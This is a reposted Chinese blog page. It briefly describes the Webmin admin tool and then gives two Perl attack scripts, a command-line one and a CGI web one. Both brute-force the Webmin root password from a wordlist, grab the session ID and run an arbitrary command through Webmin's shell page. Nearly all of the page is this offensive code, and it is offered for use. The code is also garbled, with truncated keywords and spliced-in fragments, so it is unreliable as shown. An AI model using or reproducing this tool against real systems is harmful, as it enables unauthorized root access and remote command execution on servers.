文章来源:neeao's blog
Webmin是
个广泛使用
运行在linux/unix下,用浏览器来管理系统工具
用它你不必知道复杂命令行也不用了解各种复杂配置文件系统管理变得非常简单!可以设置帐号配置DNS和文件共享等.Webmin BruteForce + Command execution v1.5
#!/usr/bin/perl
################################################################################
# Webmin BruteForce + Command execution
# v1.0:By Di42lo - #1.wordlist func.
#2.log (line:41)
################################################################################
# usage:
# ./webmin1.pl <host> <command> <wordlist>
#./webmin1.pl 192.168.0.5 "uptime" wordlist.txt
# [+] BruteForcing...
# [+] trying to enter with: admim
# [+] trying to enter with: admin
# [+] Found SID : f3231ff32849fa0c8c98487ba8c09dbb
# [+] Password : admin
# [+] Connecting to host _disibledevent=>www.abcd.com \"id\" wordlist.txt\n";
exit;
}
my $host=$ARGV[0];
my $cmd=$ARGV[1];
my $wlist=$ARGV[2];
open (data, "$wlist");
@wordlist=<data>;
close data;
$passx=@wordlist;
open(results , ">$host.log");
pr
results "#############################\n";pr
results "Webmin BruteForce + Command execution v1.5\n";pr
results "Host:$host\n";pr
results "#############################\n";my $chk=0;
my $sock = IO::Socket::INET->
(Proto => "tcp", PeerAddr => "$host",PeerPort => "10000",Timeout => 10);
(!$sock){pr
"[-] Webmin _disibledevent=>while ($chk!=1) {$n
;($n>$passx){exit;
}
$pass=@wordlist[$passx-$n];
my $pass_line="page=%2F&user=root&pass=$pass";
my $buffer="POST /session_login.cgi HTTP/1.0\n".
"Host: $host:10000\n".
"Keep-Alive: 300\n".
"Connection: keep-alive\n".
"Referer: http://$host:10000/\n".
"Cookie: testing=1\n".
"Content-Type: application/x-www-form-urlencoded\n".
"Content-Length: __\n".
"\n".
$pass_line."\n\n";
my $line_size=length($pass_line);
$buffer=~s/__/$line_size/g;
my $sock = IO::Socket::INET->
(Proto => "tcp", PeerAddr => "$host",PeerPort => "10000",Timeout => 10);
($sock){pr
"[+] trying to enter with: $pass\n";pr
$sock $buffer;while ($answer=<$sock>){
($answer=~/sid=(.*);/g){$chk=1;
$sid=$1;
pr
"[+] Found SID : $sid\n";pr
"[+] Password : $pass\n";pr
results "[+]:Password:$pass\nSid:$sid\n";}
}
}
$sock->close;
pr
results "[-]$pass\n";}
pr
"[+] Connecting to host _disibledevent=>=> "10000",Timeout => 10);(!$sock){pr
"[-] Cant Connect _disibledevent=>"Content-Disposition: form-data; name=\"cmd\"\n"."\n".
"$cmd\n".
"-----------------------------19777347561180971495777867604\n".
"Content-Disposition: form-data; name=\"pwd\"\n".
"\n".
"/root\n".
"-----------------------------19777347561180971495777867604\n".
"Content-Disposition: form-data; name=\"history\"\n".
"\n".
"\n".
"-----------------------------19777347561180971495777867604\n".
"Content-Disposition: form-data; name=\"previous\"\n".
"\n".
"$cmd\n".
"-----------------------------19777347561180971495777867604\n".
"Content-Disposition: form-data; name=\"pcmd\"\n".
"\n".
"$cmd\n".
"-----------------------------19777347561180971495777867604--\n\n";
my $buffer_size=length($temp);
$buffer="POST /shell/index.cgi HTTP/1.1\n".
"Host: $host:10000\n".
"Keep-Alive: 300\n".
"Connection: keep-alive\n".
"Referer: http://$host:10000/shell/\n".
"Cookie: sid=$sid\; testing=1; x\n".
"Content-Type: multipart/form-data;
boundary=---------------------------19777347561180971495777867604\n".
"Content-Length: siz\n".
"\n".
$temp;
$buffer=~s/siz/$buffer_size/g;
pr
$sock $buffer; ($sock){pr
"[+] Buffer sent...running command $cmd\n";pr
$sock $buffer;while ($answer=<$sock>){
($answer=~/defaultStatus="(.*)";/g) { pr $1."\n";} ($answer=~/<td><pre><b>>/g){$cmd_chk=1;
}
($cmd_chk
1) { ($answer=~/<\/pre><\/td><\/tr>/g){exit;
}
{pr
$answer;pr
results "[+]$answer\n";}
}
}
}
#!/usr/bin/perl
use CGI qw(:standard);
use IO::Socket;
$CGI::HEADERS_ONCE = 1;
$CGI =
CGI;$atak = $CGI->param("atak");
$host = $CGI->param("host");
$wlist = $CGI->param("wlist");
$cmd = $CGI->param("cmd");
pr
$CGI->header(-type=>'text/html',-char
=>'windows-1254');pr
qq~<html><head><meta http-equiv=Content-Type" content=text/html;char
=ISO-8859-9><title>Webmin Web Brute Force v1.5 - cgiversiyon</title></head>
<body bgcolor=black text=red>Webmin Web Brute Force v1.5 - cgi versiyon<br>
<font color=blue>
Webmin BruteForce + Command execution- cgi version<br>
v1.0:By Di42lo - [email protected]<br>
v1.5:By ZzagorR - [email protected] - www.rootbinbash.com<br>
</font>~;
($atak eq "webmin") {open (data, "$wlist");
@wordlist=<data>;
close data;
$passx=@wordlist;
$chk=0;
$sock = IO::Socket::INET->
(Proto => "tcp", PeerAddr => "$host",PeerPort => "10000",Timeout => 25) || die "[-] Webmin _disibledevent=>while ($chk!=1) {
$n
;($n>$passx){exit;
}
$pass=@wordlist[$passx-$n];
$pass_line="page=%2F&user=root&pass=$pass";
$buffer="POST /session_login.cgi HTTP/1.0\n".
"Host: $host:10000\n".
"Keep-Alive: 300\n".
"Connection: keep-alive\n".
"Referer: http://$host:10000/\n".
"Cookie: testing=1\n".
"Content-Type: application/x-www-form-urlencoded\n".
"Content-Length: __\n".
"\n".
$pass_line."\n\n";
$line_size=length($pass_line);
$buffer=~s/__/$line_size/g;
$sock = IO::Socket::INET->
(Proto => "tcp", PeerAddr => "$host",PeerPort => "10000",Timeout => 25);
($sock){pr
"[+] Denenen sre: $pass<br>";pr
$sock $buffer;while ($answer=<$sock>){
($answer=~/sid=(.*);/g){$chk=1;
$sid=$1;
pr
"[+] Found SID : $sid<br>";pr
"[+] Sre : $pass<br>";}
}
}
$sock->close;
}
pr
"[+] Connecting to host _disibledevent=>=> "10000",Timeout => 10) || die "[-] Cant Connect _disibledevent=>"Content-Disposition: form-data; name=\"cmd\"\n"."\n".
"$cmd\n".
"-----------------------------19777347561180971495777867604\n".
"Content-Disposition: form-data; name=\"pwd\"\n".
"\n".
"/root\n".
"-----------------------------19777347561180971495777867604\n".
"Content-Disposition: form-data; name=\"history\"\n".
"\n".
"\n".
"-----------------------------19777347561180971495777867604\n".
"Content-Disposition: form-data; name=\"previous\"\n".
"\n".
"$cmd\n".
"-----------------------------19777347561180971495777867604\n".
"Content-Disposition: form-data; name=\"pcmd\"\n".
"\n".
"$cmd\n".
"-----------------------------19777347561180971495777867604--\n\n";
$buffer_size=length($temp);
$buffer="POST /shell/index.cgi HTTP/1.1\n".
"Host: $host:10000\n".
"Keep-Alive: 300\n".
"Connection: keep-alive\n".
"Referer: http://$host:10000/shell/\n".
"Cookie: sid=$sid\; testing=1; x\n".
"Content-Type: multipart/form-data;
boundary=---------------------------19777347561180971495777867604\n".
"Content-Length: siz\n".
"\n".
$temp;
$buffer=~s/siz/$buffer_size/g;
pr
$sock $buffer; ($sock){pr
"[+] Buffer sent...running command $cmd<br>";pr
$sock $buffer;while ($answer=<$sock>){
($answer=~/defaultStatus="(.*)";/g) { pr $1."<br>";} ($answer=~/<td><pre><b>>/g){$cmd_chk=1;
}
($cmd_chk1) { ($answer=~/<\/pre><\/td><\/tr>/g){exit;
}
{pr
$answer;}
}
}
}
}
($atak eq ""){pr
qq~<table align=left cellspacing="0" cellpading="0"><form aciton=?><input
type=hidden name=atak value=webmin>
<tr><td colspan="3" align=center>Webmin Web Brute Force v1.5 - cgi
version</td></tr>
<tr><td>Server:</td><td colspan="2"><input type="text" name="host" size="50"
value="
www."></td></tr>
<tr><td valign="top">Wordlist:</td><td valign="top"><input type="file"
name="wlist"></td><td valign="top"
align="left">Examples:<br>---------<br>admin<br>administrator<br>redhat<br>mandrake<br>suse<br></td></tr>
<tr><td>Cmd:</td><td colspan="2"><input type="text" name="cmd" size="50"
value="uptime"></td></tr>
<tr><td colspan="3" align="center"><input type="submit" name=""
value="Gooooooo!"></td></tr>
</form></table></body></html>~;
摘自:http://lams.blogchina.com
最新评论